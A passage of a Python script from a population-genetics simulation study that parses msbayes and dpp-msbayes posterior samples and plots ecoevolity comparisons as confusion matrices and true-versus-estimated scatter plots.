    plt.savefig(plot_path)
    _LOG.info("Plots written to {0!r}\n".format(plot_path))
def get_msbayes_results(
        true_path,
        sim_dir,
        number_of_pairs = 3,
        number_of_sims = 500,
        posterior_sample_size = 2000,
        prior_sample_size = 600000):
    """Parse msbayes/dpp-msbayes simulation output into a results dict.

    Parameters
    ----------
    true_path : str
        Path to the tab-delimited spreadsheet of true parameter values
        (one row per simulation replicate).
    sim_dir : str
        Directory holding one gzipped posterior-sample file per replicate,
        named ``d1-m1-s{sim_num}-{prior_sample_size}-posterior-sample.txt.gz``.
    number_of_pairs : int
        Number of population pairs per simulated data set.
    number_of_sims : int
        Expected number of replicates (checked with an assert).
    posterior_sample_size : int
        Currently unused; kept for interface compatibility with callers.
    prior_sample_size : int
        Prior sample size encoded in the posterior file names.

    Returns
    -------
    dict
        ``'divergence time'``, ``'root population size'``, and
        ``'leaf population size'`` each map to lists keyed
        ``'true'``/``'mean'``/``'lower'``/``'upper'``; ``'nevents'`` and
        ``'model'`` each map to lists keyed
        ``'true'``/``'map'``/``'cred_level'``/``'true_prob'``/``'map_prob'``.
    """
    results = {
            'divergence time': {'true': [], 'mean': [], 'lower': [], 'upper': []},
            'root population size': {'true': [], 'mean': [], 'lower': [], 'upper': []},
            'leaf population size': {'true': [], 'mean': [], 'lower': [], 'upper': []},
            'nevents': {'true': [], 'map': [], 'cred_level': [], 'true_prob': [], 'map_prob': []},
            'model': {'true': [], 'map': [], 'cred_level': [], 'true_prob': [], 'map_prob': []},
    }
    # Column-name prefixes used by the msbayes spreadsheets for each
    # parameter; leaf sizes have one column per descendant population.
    column_header_prefixes = {
            'divergence time': ("PRI.t.",),
            'root population size': ("PRI.aTheta.",),
            'leaf population size': ("PRI.d1Theta.", "PRI.d2Theta."),
    }
    true_values = pycoevolity.parsing.get_dict_from_spreadsheets(
            [true_path],
            sep = '\t')
    # FIX: dict.values() is a non-subscriptable view on Python 3, so grab
    # an arbitrary column with next(iter(...)) to count rows (the old
    # ``values()[0]`` only worked on Python 2).
    nsims = len(next(iter(true_values.values())))
    assert (nsims == number_of_sims)
    for sim_idx in range(nsims):
        posterior_path = os.path.join(sim_dir,
                "d1-m1-s{sim_num}-{prior_sample_size}-posterior-sample.txt.gz".format(
                    sim_num = sim_idx + 1,
                    prior_sample_size = prior_sample_size))
        _LOG.info("Parsing {0}".format(posterior_path))
        posterior = pycoevolity.parsing.get_dict_from_spreadsheets(
                [posterior_path],
                sep = '\t')
        for pair_idx in range(number_of_pairs):
            for parameter_key, header_prefixes in column_header_prefixes.items():
                for header_prefix in header_prefixes:
                    header = "{0}{1}".format(header_prefix, pair_idx + 1)
                    if parameter_key.endswith("size"):
                        # Population sizes are divided by 4 (presumably
                        # rescaling theta = 4*N*mu -- TODO confirm against
                        # the ecoevolity results' scale).
                        true_val = float(true_values[header][sim_idx]) / 4.0
                        post_sum = pycoevolity.stats.get_summary((float(x) / 4.0) for x in posterior[header])
                    else:
                        true_val = float(true_values[header][sim_idx])
                        post_sum = pycoevolity.stats.get_summary(float(x) for x in posterior[header])
                    results[parameter_key]['true'].append(true_val)
                    results[parameter_key]['mean'].append(post_sum['mean'])
                    results[parameter_key]['lower'].append(post_sum['qi_95'][0])
                    results[parameter_key]['upper'].append(post_sum['qi_95'][1])
        # Summarize the divergence-time partition (the "model") by
        # standardizing each posterior sample's vector of times.
        true_div_times = [float(true_values["PRI.t.{0}".format(i + 1)][sim_idx]) for i in range(number_of_pairs)]
        n_post_samples = len(posterior["PRI.Psi"])
        div_times = []
        for post_idx in range(n_post_samples):
            div_times.append([float(posterior["PRI.t.{0}".format(i + 1)][post_idx]) for i in range(number_of_pairs)])
        assert len(div_times) == n_post_samples
        true_model = get_standardized_partiton_str(true_div_times)
        models = [get_standardized_partiton_str(t) for t in div_times]
        model_freqs = pycoevolity.stats.get_freqs(models)
        sorted_model_freqs = sorted(model_freqs.items(), reverse = True,
                key = lambda x: x[1])
        map_model = sorted_model_freqs[0][0]
        # FIX: use .get with 0.0 so a true model/nevents that was never
        # sampled in the posterior gets probability 0 instead of KeyError.
        true_model_prob = model_freqs.get(true_model, 0.0)
        map_model_prob = model_freqs[map_model]
        # Credibility level of the true model: cumulative frequency of all
        # models ranked above it (1.0 if it was never sampled).
        model_cred_level = 0.0
        for n, p in sorted_model_freqs:
            if n == true_model:
                break
            model_cred_level += p
        results['model']['true'].append(true_model)
        results['model']['map'].append(map_model)
        results['model']['true_prob'].append(true_model_prob)
        results['model']['map_prob'].append(map_model_prob)
        results['model']['cred_level'].append(model_cred_level)
        true_nevents = int(true_values["PRI.Psi"][sim_idx])
        nevent_freqs = pycoevolity.stats.get_freqs(int(x) for x in posterior["PRI.Psi"])
        sorted_nevent_freqs = sorted(nevent_freqs.items(), reverse = True,
                key = lambda x: x[1])
        map_nevents = sorted_nevent_freqs[0][0]
        true_nevents_prob = nevent_freqs.get(true_nevents, 0.0)
        map_nevents_prob = nevent_freqs[map_nevents]
        results['nevents']['true'].append(true_nevents)
        results['nevents']['map'].append(map_nevents)
        results['nevents']['true_prob'].append(true_nevents_prob)
        results['nevents']['map_prob'].append(map_nevents_prob)
        cred_level = 0.0
        for n, p in sorted_nevent_freqs:
            if n == true_nevents:
                break
            cred_level += p
        results['nevents']['cred_level'].append(cred_level)
    assert (len(results['divergence time']['true']) == number_of_sims * number_of_pairs)
    assert (len(results['root population size']['true']) == number_of_sims * number_of_pairs)
    assert (len(results['leaf population size']['true']) == number_of_sims * number_of_pairs * 2)
    assert (len(results['nevents']['true']) == number_of_sims)
    assert (len(results['model']['true']) == number_of_sims)
    return results
def generate_bake_off_plots(
        number_of_pairs = 3,
        number_of_sims = 500,
        posterior_sample_size = 2000,
        prior_sample_size = 500000,
        include_msbayes = False):
    """Compare ecoevolity against (dpp-)msbayes on the bake-off simulations.

    For each key of ``parameter_dict`` this produces one figure with a
    column per method (ecoevolity, dpp-msbayes, and optionally msbayes):
    a nevents confusion matrix (``nevents.pdf``), a divergence-model
    confusion matrix (``model.pdf``, only when ``number_of_pairs == 3``),
    and true-vs-estimated scatter plots with 95% intervals for the
    continuous parameters (``<parameter>-scatter.pdf``). All files are
    written to the ``plots`` subdirectory of ``project_util.BAKE_OFF_DIR``.

    ``posterior_sample_size`` and ``prior_sample_size`` are forwarded to
    ``get_msbayes_results``; ``include_msbayes`` adds a third column with
    the vanilla-msbayes results.
    """
    _LOG.info("Generating plots of bake-off results...")
    plot_dir = os.path.join(project_util.BAKE_OFF_DIR, "plots")
    if not os.path.exists(plot_dir):
        os.mkdir(plot_dir)
    # Parse the msbayes-family results (vanilla msbayes only on request).
    msbayes_results = None
    if include_msbayes:
        msbayes_results = get_msbayes_results(
                true_path = os.path.join(project_util.BAKE_OFF_DIR,
                        "results",
                        "msbayes",
                        "pymsbayes-results",
                        "observed-summary-stats",
                        "observed-1.txt"),
                sim_dir = os.path.join(project_util.BAKE_OFF_DIR,
                        "results",
                        "msbayes",
                        "pymsbayes-results",
                        "pymsbayes-output",
                        "d1",
                        "m1"),
                number_of_pairs = number_of_pairs,
                number_of_sims = number_of_sims,
                posterior_sample_size = posterior_sample_size,
                prior_sample_size = prior_sample_size)
    dpp_msbayes_results = get_msbayes_results(
            true_path = os.path.join(project_util.BAKE_OFF_DIR,
                    "results",
                    "dpp-msbayes",
                    "pymsbayes-results",
                    "observed-summary-stats",
                    "observed-1.txt"),
            sim_dir = os.path.join(project_util.BAKE_OFF_DIR,
                    "results",
                    "dpp-msbayes",
                    "pymsbayes-results",
                    "pymsbayes-output",
                    "d1",
                    "m1"),
            number_of_pairs = number_of_pairs,
            number_of_sims = number_of_sims,
            posterior_sample_size = posterior_sample_size,
            prior_sample_size = prior_sample_size)
    # Ecoevolity results come from the validation batches (5 batches of the
    # 3-pair, 40k-character, 200-linked-loci simulations).
    results_paths = glob.glob(os.path.join(project_util.VAL_DIR,
            "03pairs-dpp-root-0100-040k-0200l",
            "batch00[12345]",
            "results.csv.gz"))
    results = pycoevolity.parsing.get_dict_from_spreadsheets(
            results_paths,
            sep = "\t",
            offset = 0)
    cmap = truncate_color_map(plt.cm.binary, 0.0, 0.65, 100)
    # Map each plotted quantity to its ecoevolity column names; 'nevents'
    # and 'model' are handled by dedicated branches below.
    parameter_dict = {
            "divergence time": [
                    "root_height_c1sp1",
                    "root_height_c2sp1",
                    "root_height_c3sp1",
            ],
            "root population size": [
                    "pop_size_root_c1sp1",
                    "pop_size_root_c2sp1",
                    "pop_size_root_c3sp1",
            ],
            "leaf population size": [
                    "pop_size_c1sp1",
                    "pop_size_c2sp1",
                    "pop_size_c3sp1",
                    "pop_size_c1sp2",
                    "pop_size_c2sp2",
                    "pop_size_c3sp2",
            ],
            "nevents": [],
            "model": [],
    }
    col_headers = [
            'ecoevolity',
            'dpp-msbayes',
    ]
    if include_msbayes:
        col_headers.append('msbayes')
    for parameter_key, parameters in parameter_dict.items():
        parameter_label = parameter_key
        parameter_symbol = "\\tau"
        if parameter_key.endswith("size"):
            parameter_symbol = "N_e\\mu"
        plt.close('all')
        if include_msbayes:
            fig = plt.figure(figsize = (9, 3))
        else:
            fig = plt.figure(figsize = (6, 3))
        nrows = 1
        ncols = len(col_headers)
        gs = gridspec.GridSpec(nrows, ncols,
                wspace = 0.0,
                hspace = 0.0)
        # ----- Branch 1: confusion matrix of number of events ------------
        if parameter_key == "nevents":
            # Reshape the ecoevolity spreadsheet columns into the same
            # dict-of-lists layout that get_msbayes_results returns.
            ecoevolity_results = {'true': [], 'map': [], 'cred_level': [],
                    'true_prob': [], 'map_prob': []}
            ecoevolity_results['true'].extend(int(x) for x in results["true_num_events"])
            ecoevolity_results['map'].extend(int(x) for x in results["map_num_events"])
            ecoevolity_results['cred_level'].extend(float(x) for x in results["true_num_events_cred_level"])
            for i in range(len(results["map_num_events"])):
                map_n = results["map_num_events"][i]
                map_p = float(results["num_events_{0}_p".format(map_n)][i])
                true_n = results["true_num_events"][i]
                true_p = float(results["num_events_{0}_p".format(true_n)][i])
                ecoevolity_results["map_prob"].append(map_p)
                ecoevolity_results["true_prob"].append(true_p)
            all_results = {
                    'ecoevolity' : ecoevolity_results,
                    'dpp-msbayes': dpp_msbayes_results[parameter_key],
            }
            if include_msbayes:
                all_results['msbayes'] = msbayes_results[parameter_key]
            row_idx = 0
            # One confusion-matrix panel per method.
            for col_idx, col_header in enumerate(col_headers):
                r = all_results[col_header]
                true_nevents = r['true']
                map_nevents = r['map']
                map_nevents_probs = r['map_prob']
                true_nevents_probs = r['true_prob']
                true_nevents_cred_levels = r['cred_level']
                assert(len(true_nevents) == len(map_nevents))
                assert(len(true_nevents) == len(true_nevents_cred_levels))
                assert(len(true_nevents) == len(map_nevents_probs))
                assert(len(true_nevents) == len(true_nevents_probs))
                mean_true_nevents_prob = sum(true_nevents_probs) / len(true_nevents_probs)
                median_true_nevents_prob = pycoevolity.stats.median(true_nevents_probs)
                nevents_within_95_cred = 0
                ncorrect = 0
                # Matrix indexed [MAP nevents - 1][true nevents - 1].
                true_map_nevents = []
                true_map_probs = []
                for i in range(number_of_pairs):
                    true_map_nevents.append([0 for i in range(number_of_pairs)])
                    true_map_probs.append([[] for i in range(number_of_pairs)])
                for i in range(len(true_nevents)):
                    true_map_nevents[map_nevents[i] - 1][true_nevents[i] - 1] += 1
                    true_map_probs[map_nevents[i] - 1][true_nevents[i] - 1].append(map_nevents_probs[i])
                    if true_nevents_cred_levels[i] <= 0.95:
                        nevents_within_95_cred += 1
                    if true_nevents[i] == map_nevents[i]:
                        ncorrect += 1
                p_nevents_within_95_cred = nevents_within_95_cred / float(len(true_nevents))
                p_correct = ncorrect / float(len(true_nevents))
                _LOG.info("p(nevents within CS) = {0:.4f}".format(p_nevents_within_95_cred))
                ax = plt.subplot(gs[row_idx, col_idx])
                ax.imshow(true_map_nevents,
                        origin = 'lower',
                        cmap = cmap,
                        interpolation = 'none',
                        aspect = 'auto'
                        # extent = [0.5, 3.5, 0.5, 3.5]
                        )
                # Annotate each cell with its replicate count.
                for i, row_list in enumerate(true_map_nevents):
                    for j, num_events in enumerate(row_list):
                        # if num_events > 0:
                        #     map_probs = true_map_probs[i][j]
                        #     assert len(map_probs) == num_events
                        #     mean_prob = sum(map_probs) / len(map_probs)
                        #     median_prob = pycoevolity.stats.median(map_probs)
                        #     ax.text(j, i,
                        #             "{0:d}\n{1:.3f}".format(num_events, median_prob),
                        #             horizontalalignment = "center",
                        #             verticalalignment = "center")
                        # else:
                        ax.text(j, i,
                                str(num_events),
                                horizontalalignment = "center",
                                verticalalignment = "center")
                ax.text(0.98, 0.02,
                        "\\scriptsize$p(k \\in \\textrm{{\\sffamily CS}}) = {0:.3f}$".format(
                                p_nevents_within_95_cred),
                        horizontalalignment = "right",
                        verticalalignment = "bottom",
                        transform = ax.transAxes)
                ax.text(0.02, 0.98,
                        "\\scriptsize$p(\\hat{{k}} = k) = {0:.3f}$".format(
                                p_correct),
                        horizontalalignment = "left",
                        verticalalignment = "top",
                        transform = ax.transAxes)
                # ax.text(0.99, 0.99,
                #         "\\scriptsize$\\overline{{pp(k)}} = {0:.3f}$".format(
                #                 mean_true_nevents_prob),
                #         horizontalalignment = "right",
                #         verticalalignment = "top",
                #         transform = ax.transAxes)
                ax.text(0.98, 0.98,
                        "\\scriptsize$\\widetilde{{p(k|\\mathbf{{D}})}} = {0:.3f}$".format(
                                median_true_nevents_prob),
                        horizontalalignment = "right",
                        verticalalignment = "top",
                        transform = ax.transAxes)
                if row_idx == 0:
                    ax.text(0.5, 1.015,
                            col_header,
                            horizontalalignment = "center",
                            verticalalignment = "bottom",
                            size = 16.0,
                            transform = ax.transAxes)
            # show only the outside ticks
            all_axes = fig.get_axes()
            for ax in all_axes:
                if not ax.is_last_row():
                    ax.set_xticks([])
                if not ax.is_first_col():
                    ax.set_yticks([])
            # show tick labels only for lower-left plot
            all_axes = fig.get_axes()
            for ax in all_axes:
                ax.xaxis.set_ticks(range(number_of_pairs))
                ax.yaxis.set_ticks(range(number_of_pairs))
                if ax.is_last_row() and ax.is_first_col():
                    xtick_labels = [item for item in ax.get_xticklabels()]
                    for i in range(len(xtick_labels)):
                        xtick_labels[i].set_text(str(i + 1))
                    ytick_labels = [item for item in ax.get_yticklabels()]
                    for i in range(len(ytick_labels)):
                        ytick_labels[i].set_text(str(i + 1))
                    ax.set_xticklabels(xtick_labels)
                    ax.set_yticklabels(ytick_labels)
                else:
                    xtick_labels = ["" for item in ax.get_xticklabels()]
                    ytick_labels = ["" for item in ax.get_yticklabels()]
                    ax.set_xticklabels(xtick_labels)
                    ax.set_yticklabels(ytick_labels)
            # avoid doubled spines
            all_axes = fig.get_axes()
            for ax in all_axes:
                for sp in ax.spines.values():
                    sp.set_visible(False)
                    sp.set_linewidth(2)
                if ax.is_first_row():
                    ax.spines['top'].set_visible(True)
                    ax.spines['bottom'].set_visible(True)
                else:
                    ax.spines['bottom'].set_visible(True)
                if ax.is_first_col():
                    ax.spines['left'].set_visible(True)
                    ax.spines['right'].set_visible(True)
                else:
                    ax.spines['right'].set_visible(True)
            fig.text(0.5, 0.002,
                    "True number of events ($k$)",
                    horizontalalignment = "center",
                    verticalalignment = "bottom",
                    size = 12.0)
            fig.text(0.005, 0.5,
                    "MAP number of events ($\\hat{{k}}$)",
                    horizontalalignment = "left",
                    verticalalignment = "center",
                    rotation = "vertical",
                    size = 12.0)
            gs.update(left = 0.08, right = 0.995, bottom = 0.14, top = 0.91)
            plot_path = os.path.join(plot_dir,
                    "nevents.pdf")
            plt.savefig(plot_path)
            _LOG.info("Plots written to {0!r}\n".format(plot_path))
            continue
        # ----- Branch 2: confusion matrix of divergence models -----------
        if parameter_key == "model":
            # The hard-coded model set below only covers 3 pairs.
            if number_of_pairs != 3:
                continue
            # The 5 set partitions of 3 comparisons, in standardized form.
            model_to_index = {
                    "000": 0,
                    "001": 1,
                    "010": 2,
                    "011": 3,
                    "012": 4,
            }
            number_of_models = len(model_to_index)
            index_to_model = {}
            for k, v in model_to_index.items():
                index_to_model[v] = k
            ecoevolity_results = {'true': [], 'map': [], 'cred_level': [],
                    'true_prob': [], 'map_prob': []}
            ecoevolity_results['true'].extend(x for x in results["true_model"])
            ecoevolity_results['map'].extend(x for x in results["map_model"])
            ecoevolity_results['cred_level'].extend(float(x) for x in results["true_model_cred_level"])
            ecoevolity_results['true_prob'].extend(float(x) for x in results["true_model_p"])
            ecoevolity_results['map_prob'].extend(float(x) for x in results["map_model_p"])
            all_results = {
                    'ecoevolity' : ecoevolity_results,
                    'dpp-msbayes': dpp_msbayes_results[parameter_key],
            }
            if include_msbayes:
                all_results['msbayes'] = msbayes_results[parameter_key]
            row_idx = 0
            for col_idx, col_header in enumerate(col_headers):
                r = all_results[col_header]
                true_model = r['true']
                map_model = r['map']
                map_model_probs = r['map_prob']
                true_model_probs = r['true_prob']
                true_model_cred_levels = r['cred_level']
                assert(len(true_model) == len(map_model))
                assert(len(true_model) == len(true_model_cred_levels))
                assert(len(true_model) == len(map_model_probs))
                assert(len(true_model) == len(true_model_probs))
                mean_true_model_prob = sum(true_model_probs) / len(true_model_probs)
                median_true_model_prob = pycoevolity.stats.median(true_model_probs)
                model_within_95_cred = 0
                ncorrect = 0
                # Matrix indexed [MAP model index][true model index].
                true_map_model = []
                true_map_probs = []
                for i in range(number_of_models):
                    true_map_model.append([0 for i in range(number_of_models)])
                    true_map_probs.append([[] for i in range(number_of_models)])
                for i in range(len(true_model)):
                    true_map_model[model_to_index[map_model[i]]][model_to_index[true_model[i]]] += 1
                    true_map_probs[model_to_index[map_model[i]]][model_to_index[true_model[i]]].append(map_model_probs[i])
                    if true_model_cred_levels[i] <= 0.95:
                        model_within_95_cred += 1
                    if true_model[i] == map_model[i]:
                        ncorrect += 1
                p_model_within_95_cred = model_within_95_cred / float(len(true_model))
                p_correct = ncorrect / float(len(true_model))
                _LOG.info("p(model within CS) = {0:.4f}".format(p_model_within_95_cred))
                ax = plt.subplot(gs[row_idx, col_idx])
                ax.imshow(true_map_model,
                        origin = 'lower',
                        cmap = cmap,
                        interpolation = 'none',
                        aspect = 'auto'
                        # extent = [0.5, 3.5, 0.5, 3.5]
                        )
                for i, row_list in enumerate(true_map_model):
                    for j, num_events in enumerate(row_list):
                        # if num_events > 0:
                        #     map_probs = true_map_probs[i][j]
                        #     assert len(map_probs) == num_events
                        #     mean_prob = sum(map_probs) / len(map_probs)
                        #     median_prob = pycoevolity.stats.median(map_probs)
                        #     ax.text(j, i,
                        #             "{0:d}\n{1:.3f}".format(num_events, median_prob),
                        #             horizontalalignment = "center",
                        #             verticalalignment = "center")
                        # else:
                        ax.text(j, i,
                                str(num_events),
                                horizontalalignment = "center",
                                verticalalignment = "center")
                ax.text(0.98, 0.02,
                        "\\scriptsize$p(\\mathcal{{T}} \\in \\textrm{{\\sffamily CS}}) = {0:.3f}$".format(
                                p_model_within_95_cred),
                        horizontalalignment = "right",
                        verticalalignment = "bottom",
                        transform = ax.transAxes)
                ax.text(0.02, 0.98,
                        "\\scriptsize$p(\\hat{{\\mathcal{{T}}}} = \\mathcal{{T}}) = {0:.3f}$".format(
                                p_correct),
                        horizontalalignment = "left",
                        verticalalignment = "top",
                        transform = ax.transAxes)
                # ax.text(0.99, 0.99,
                #         "\\scriptsize$\\overline{{pp(k)}} = {0:.3f}$".format(
                #                 mean_true_model_prob),
                #         horizontalalignment = "right",
                #         verticalalignment = "top",
                #         transform = ax.transAxes)
                ax.text(0.98, 0.98,
                        "\\scriptsize$\\widetilde{{p(\\mathcal{{T}}|\\mathbf{{D}})}} = {0:.3f}$".format(
                                median_true_model_prob),
                        horizontalalignment = "right",
                        verticalalignment = "top",
                        transform = ax.transAxes)
                if row_idx == 0:
                    ax.text(0.5, 1.015,
                            col_header,
                            horizontalalignment = "center",
                            verticalalignment = "bottom",
                            size = 16.0,
                            transform = ax.transAxes)
            # show only the outside ticks
            all_axes = fig.get_axes()
            for ax in all_axes:
                if not ax.is_last_row():
                    ax.set_xticks([])
                if not ax.is_first_col():
                    ax.set_yticks([])
            # show tick labels only for lower-left plot
            all_axes = fig.get_axes()
            for ax in all_axes:
                ax.xaxis.set_ticks(range(number_of_models))
                ax.yaxis.set_ticks(range(number_of_models))
                if ax.is_last_row() and ax.is_first_col():
                    xtick_labels = [item for item in ax.get_xticklabels()]
                    for i in range(len(xtick_labels)):
                        xtick_labels[i].set_text(index_to_model[i])
                    ytick_labels = [item for item in ax.get_yticklabels()]
                    for i in range(len(ytick_labels)):
                        ytick_labels[i].set_text(index_to_model[i])
                    ax.set_xticklabels(xtick_labels)
                    ax.set_yticklabels(ytick_labels)
                else:
                    xtick_labels = ["" for item in ax.get_xticklabels()]
                    ytick_labels = ["" for item in ax.get_yticklabels()]
                    ax.set_xticklabels(xtick_labels)
                    ax.set_yticklabels(ytick_labels)
            # avoid doubled spines
            all_axes = fig.get_axes()
            for ax in all_axes:
                for sp in ax.spines.values():
                    sp.set_visible(False)
                    sp.set_linewidth(2)
                if ax.is_first_row():
                    ax.spines['top'].set_visible(True)
                    ax.spines['bottom'].set_visible(True)
                else:
                    ax.spines['bottom'].set_visible(True)
                if ax.is_first_col():
                    ax.spines['left'].set_visible(True)
                    ax.spines['right'].set_visible(True)
                else:
                    ax.spines['right'].set_visible(True)
            fig.text(0.5, 0.002,
                    "True model ($\\mathcal{{T}}$)",
                    horizontalalignment = "center",
                    verticalalignment = "bottom",
                    size = 12.0)
            fig.text(0.005, 0.5,
                    "MAP model ($\\hat{{\\mathcal{{T}}}}$)",
                    horizontalalignment = "left",
                    verticalalignment = "center",
                    rotation = "vertical",
                    size = 12.0)
            gs.update(left = 0.095, right = 0.995, bottom = 0.14, top = 0.91)
            plot_path = os.path.join(plot_dir,
                    "model.pdf")
            plt.savefig(plot_path)
            _LOG.info("Plots written to {0!r}\n".format(plot_path))
            continue
        # ----- Branch 3: true-vs-estimated scatter plots ------------------
        # Shared axis limits across all methods so panels are comparable.
        parameter_min = float('inf')
        parameter_max = float('-inf')
        for parameter_str in parameters:
            parameter_min = min(parameter_min,
                    min(float(x) for x in results["true_{0}".format(parameter_str)]))
            parameter_max = max(parameter_max,
                    max(float(x) for x in results["true_{0}".format(parameter_str)]))
            parameter_min = min(parameter_min,
                    min(float(x) for x in results["mean_{0}".format(parameter_str)]))
            parameter_max = max(parameter_max,
                    max(float(x) for x in results["mean_{0}".format(parameter_str)]))
        parameter_min = min(parameter_min,
                min(dpp_msbayes_results[parameter_key]['true']))
        parameter_min = min(parameter_min,
                min(dpp_msbayes_results[parameter_key]['mean']))
        parameter_max = max(parameter_max,
                max(dpp_msbayes_results[parameter_key]['true']))
        parameter_max = max(parameter_max,
                max(dpp_msbayes_results[parameter_key]['mean']))
        if include_msbayes:
            parameter_min = min(parameter_min,
                    min(msbayes_results[parameter_key]['true']))
            parameter_min = min(parameter_min,
                    min(msbayes_results[parameter_key]['mean']))
            parameter_max = max(parameter_max,
                    max(msbayes_results[parameter_key]['true']))
            parameter_max = max(parameter_max,
                    max(msbayes_results[parameter_key]['mean']))
        # Pad the shared axis range by 5% on each side.
        axis_buffer = math.fabs(parameter_max - parameter_min) * 0.05
        axis_min = parameter_min - axis_buffer
        axis_max = parameter_max + axis_buffer
        # Pool the ecoevolity columns for this parameter into flat lists.
        ecoevolity_results = {'true': [], 'mean': [], 'lower': [], 'upper': []}
        for parameter_str in parameters:
            ecoevolity_results['true'].extend(float(x) for x in results["true_{0}".format(parameter_str)])
            ecoevolity_results['mean'].extend(float(x) for x in results["mean_{0}".format(parameter_str)])
            ecoevolity_results['lower'].extend(float(x) for x in results["eti_95_lower_{0}".format(parameter_str)])
            ecoevolity_results['upper'].extend(float(x) for x in results["eti_95_upper_{0}".format(parameter_str)])
        all_results = {
                'ecoevolity' : ecoevolity_results,
                'dpp-msbayes': dpp_msbayes_results[parameter_key],
        }
        if include_msbayes:
            all_results['msbayes'] = msbayes_results[parameter_key]
        row_idx = 0
        # One scatter panel per method, annotated with CI coverage and RMSE.
        for col_idx, col_header in enumerate(col_headers):
            r = all_results[col_header]
            x = r['true']
            y = r['mean']
            y_lower = r['lower']
            y_upper = r['upper']
            assert(len(x) == len(y))
            assert(len(x) == len(y_lower))
            assert(len(x) == len(y_upper))
            proportion_within_ci = pycoevolity.stats.get_proportion_of_values_within_intervals(
                    x,
                    y_lower,
                    y_upper)
            rmse = pycoevolity.stats.root_mean_square_error(x, y)
            _LOG.info("p(within CI) = {0:.4f}".format(proportion_within_ci))
            _LOG.info("RMSE = {0:.2e}".format(rmse))
            ax = plt.subplot(gs[row_idx, col_idx])
            line = ax.errorbar(
                    x = x,
                    y = y,
                    yerr = get_errors(y, y_lower, y_upper),
                    ecolor = '0.65',
                    elinewidth = 0.5,
                    capsize = 0.8,
                    barsabove = False,
                    marker = 'o',
                    linestyle = '',
                    markerfacecolor = 'none',
                    markeredgecolor = '0.35',
                    markeredgewidth = 0.7,
                    markersize = 2.5,
                    zorder = 100,
                    rasterized = True)
            ax.set_xlim(axis_min, axis_max)
            ax.set_ylim(axis_min, axis_max)
            # One-to-one line for visual reference.
            identity_line, = ax.plot(
                    [axis_min, axis_max],
                    [axis_min, axis_max])
            plt.setp(identity_line,
                    color = '0.7',
                    linestyle = '-',
                    linewidth = 1.0,
                    marker = '',
                    zorder = 0)
            ax.text(0.02, 0.97,
                    "\\scriptsize\\noindent$p({0:s} \\in \\textrm{{\\sffamily CI}}) = {1:.3f}$".format(
                            parameter_symbol,
                            proportion_within_ci),
                    horizontalalignment = "left",
                    verticalalignment = "top",
                    transform = ax.transAxes,
                    size = 6.0,
                    zorder = 200)
            ax.text(0.02, 0.87,
                    # "\\scriptsize\\noindent$\\textrm{{\\sffamily RMSE}} = {0:.2e}$".format(
                    "\\scriptsize\\noindent RMSE = {0:.2e}".format(
                            rmse),
                    horizontalalignment = "left",
                    verticalalignment = "top",
                    transform = ax.transAxes,
                    size = 6.0,
                    zorder = 200)
            if row_idx == 0:
                ax.text(0.5, 1.015,
                        col_header,
                        horizontalalignment = "center",
                        verticalalignment = "bottom",
                        size = 16.0,
                        transform = ax.transAxes)
        # show only the outside ticks
        all_axes = fig.get_axes()
        for ax in all_axes:
            if not ax.is_last_row():
                ax.set_xticks([])
            if not ax.is_first_col():
                ax.set_yticks([])
        # show tick labels only for lower-left plot
        all_axes = fig.get_axes()
        for ax in all_axes:
            if ax.is_last_row() and ax.is_first_col():
                continue
            xtick_labels = ["" for item in ax.get_xticklabels()]
            ytick_labels = ["" for item in ax.get_yticklabels()]
            ax.set_xticklabels(xtick_labels)
            ax.set_yticklabels(ytick_labels)
        # avoid doubled spines
        all_axes = fig.get_axes()
        for ax in all_axes:
            for sp in ax.spines.values():
                sp.set_visible(False)
                sp.set_linewidth(2)
            if ax.is_first_row():
                ax.spines['top'].set_visible(True)
                ax.spines['bottom'].set_visible(True)
            else:
                ax.spines['bottom'].set_visible(True)
            if ax.is_first_col():
                ax.spines['left'].set_visible(True)
                ax.spines['right'].set_visible(True)
            else:
                ax.spines['right'].set_visible(True)
        fig.text(0.5, 0.001,
                "True {0} (${1}$)".format(parameter_label, parameter_symbol),
                horizontalalignment = "center",
                verticalalignment = "bottom",
                size = 14.0)
        fig.text(0.005, 0.5,
                "Estimated {0} ($\\hat{{{1}}}$)".format(parameter_label, parameter_symbol),
                horizontalalignment = "left",
                verticalalignment = "center",
                rotation = "vertical",
                size = 12.0)
        gs.update(left = 0.11, right = 0.995, bottom = 0.17, top = 0.92)
        plot_file_prefix = parameter_label.replace(" ", "-")
        plot_path = os.path.join(plot_dir,
                "{0}-scatter.pdf".format(plot_file_prefix))
        plt.savefig(plot_path, dpi=600)
        _LOG.info("Plots written to {0!r}\n".format(plot_path))
def _generate_convergence_histograms(
        parameters,
        parameter_label,
        plot_file_prefix,
        number_of_digits,
        include_all_sizes_fixed):
    """Plot one MCMC diagnostic (ESS or PSRF) for the unlinked data and both linked-loci conditions."""
    common = dict(
            parameters = parameters,
            parameter_label = parameter_label,
            parameter_discrete = False,
            range_key = "range",
            number_of_digits = number_of_digits,
            include_all_sizes_fixed = include_all_sizes_fixed,
            include_root_size_fixed = False,
            include_variable_only = True)
    generate_histograms(
            plot_file_prefix = plot_file_prefix,
            **common)
    for loci in ("100k", "500k"):
        generate_histograms(
                plot_file_prefix = "linkage-{0}-{1}".format(
                        loci, plot_file_prefix),
                linked_loci = loci,
                **common)

def main_cli(argv = None):
    """Generate all figures for the simulation analyses.

    Parameters
    ----------
    argv : list of str, optional
        Command-line arguments.  Currently unused by the body; defaults
        to ``sys.argv`` at call time.  (Evaluating ``sys.argv`` here
        rather than in the signature avoids freezing its value at
        import time.)
    """
    if argv is None:
        argv = sys.argv
    # Each scatter suite: (parameters, axis label, math symbol, file
    # prefix, include_all_sizes_fixed, also make the 500k
    # no-variable-only variant?).  The same six data conditions are
    # plotted for every suite, in the same order as before: unlinked,
    # linkage 100k, linkage 500k, [500k no-vo], missing data, filtered
    # data, then the root-1000-500k condition.
    scatter_suites = [
        (["root_height_c1sp1",
          "root_height_c2sp1",
          "root_height_c3sp1"],
         "divergence time", "t", "div-time", True, True),
        (["pop_size_root_c1sp1",
          "pop_size_root_c2sp1",
          "pop_size_root_c3sp1"],
         "root population size", "N_e\\mu", "root-pop-size", False, False),
        (["pop_size_c1sp1",
          "pop_size_c2sp1",
          "pop_size_c3sp1"],
         "leaf population size", "N_e\\mu", "leaf-pop-size", False, False),
    ]
    for (params, label, symbol, prefix, sizes_fixed,
            with_no_vo) in scatter_suites:
        common = dict(
                parameters = params,
                parameter_label = label,
                parameter_symbol = symbol,
                include_all_sizes_fixed = sizes_fixed,
                include_root_size_fixed = False)
        generate_scatter_plots(
                plot_file_prefix = prefix,
